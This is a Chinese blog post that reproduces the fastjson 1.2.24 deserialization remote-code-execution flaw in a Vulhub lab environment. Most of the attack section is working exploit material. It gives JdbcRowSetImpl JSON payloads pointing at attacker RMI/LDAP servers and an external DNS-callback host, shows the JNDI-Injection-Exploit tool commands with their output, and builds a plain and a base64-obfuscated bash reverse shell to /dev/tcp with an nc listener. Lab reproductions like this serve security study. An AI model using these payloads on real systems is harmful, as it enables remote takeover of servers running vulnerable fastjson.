• 【漏洞复现】fastjson_1.2.24_unserializer_rce


    感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

    说明内容
    漏洞编号
    漏洞名称fastjson 1.2.24 反序列化导致任意命令执行漏洞
    漏洞评级
    影响范围
    漏洞描述
    修复方案

    1.1、漏洞描述

    FastJson是Alibaba的一款开源Json解析库,可用于将Java对象转换为其Json表示形式,也可以用于将Json字符串转换为等效的Java对象。近几年来FastJson漏洞层出不穷。RCE漏洞的源头:17年FastJson爆出的1.2.24反序列化漏洞。
    关于FastJson1.2.24反序列化漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查而导致的。

    1.2、漏洞等级

    高危

    1.3、影响版本

    1.2.24

    1.4、漏洞复现

    1、基础环境

    Path:Vulhub/fastjson/1.2.24-rce


    启动测试环境:

    sudo docker-compose up -d
    
    • 1

    访问http://your-ip:8090/即可看到

    在这里插入图片描述

    发送测试数据:

    {"name":"hello", "age":20}
    
    • 1

    在这里插入图片描述

    2、漏洞检测

    使用BurpSuite扩展插件FastjsonScan进行漏洞检测

    在这里插入图片描述

    POC:

    {
        "handsome":{
        "@type":"Lcom.sun.rowset.JdbcRowSetImpl;",
        "dataSourceName":
        "rmi://wvvlunpw9mk6u4suzoi884ibw22sqh.oastify.com/aaa",
        "autoCommit":true
        }
    }
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8

    使用dnslog测试

    在这里插入图片描述

    在这里插入图片描述

    3、漏洞验证

    利用JNDI-Injection-Exploit工具开启RMI服务器

    /tmp目录下创建hello文件

    ┌──(kali㉿kali)-[~/tools/JNDI-Injection-Exploit]
    └─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/hello" -A "192.168.80.141"
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    [ADDRESS] >> 192.168.80.141
    [COMMAND] >> touch /tmp/hello
    ----------------------------JNDI Links---------------------------- 
    Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
    rmi://192.168.80.141:1099/52e3fa
    ldap://192.168.80.141:1389/52e3fa
    Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
    rmi://192.168.80.141:1099/atawc5
    Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
    rmi://192.168.80.141:1099/gfk0fp
    ldap://192.168.80.141:1389/gfk0fp
    
    ----------------------------Server Log----------------------------
    2023-09-08 01:38:44 [JETTYSERVER]>> Listening on 0.0.0.0:8180
    2023-09-08 01:38:44 [RMISERVER]  >> Listening on 0.0.0.0:1099
    2023-09-08 01:38:44 [LDAPSERVER] >> Listening on 0.0.0.0:1389
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20

    在这里插入图片描述

    发送POC到FastJson服务器,通过RMI协议远程加载恶意类

    {
        "handsome":{
        "@type":"Lcom.sun.rowset.JdbcRowSetImpl;",
        "dataSourceName": "rmi://192.168.80.141:1099/atawc5",
        "autoCommit":true
        }
    }
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7

    在这里插入图片描述

    验证:

    在这里插入图片描述

    1.5、深度利用

    1、GetShell

    构造反弹 Shell命令:

    在这里插入图片描述

    bash -i >& /dev/tcp/192.168.80.141/1234 0>&1
    
    
    bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}
    
    • 1
    • 2
    • 3
    • 4

    监听1234端口

    nc -lvp 1234
    
    • 1

    开启RMI服务

    ┌──(kali㉿kali)-[~/tools/JNDI-Injection-Exploit]
    └─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.80.141"
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    [ADDRESS] >> 192.168.80.141
    [COMMAND] >> bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}
    ----------------------------JNDI Links---------------------------- 
    Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
    rmi://192.168.80.141:1099/qkgjya
    ldap://192.168.80.141:1389/qkgjya
    Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
    rmi://192.168.80.141:1099/n9qirm
    ldap://192.168.80.141:1389/n9qirm
    Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
    rmi://192.168.80.141:1099/nmyogr
    
    ----------------------------Server Log----------------------------
    2023-09-08 01:53:48 [JETTYSERVER]>> Listening on 0.0.0.0:8180
    2023-09-08 01:53:48 [RMISERVER]  >> Listening on 0.0.0.0:1099
    2023-09-08 01:53:48 [LDAPSERVER] >> Listening on 0.0.0.0:1389
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19

    在这里插入图片描述

    POC :

    {
        "handsome":{
        "@type":"Lcom.sun.rowset.JdbcRowSetImpl;",
        "dataSourceName": "ldap://192.168.80.141:1389/qkgjya",
        "autoCommit":true
        }
    }
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7

    在这里插入图片描述

    获得Shell

    在这里插入图片描述

  • 相关阅读:
    MATLAB算法实战应用案例精讲-【图像处理】机器视觉(基础篇)
    默认浏览器怎么更改为别的浏览器,这2个方法很简单
    【DRAM存储器十一】SDRAM介绍-各类读操作详解,附带解释了几个重要时序参数
    win11不兼容,咋办啊大家,我的世界下载16位不兼容我试了好多种办法不管用,希望有懂得,可以帮助一下
    575.分糖果
    结构型设计模式——外观模式
    华为数字化转型步骤、方法和目标
    【数据库】Redis
    如何用一部手机输出视频内容
    计算机网络——数据链路层(介质访问控制)
  • 原文地址:https://blog.csdn.net/ZhaoSong_/article/details/134221483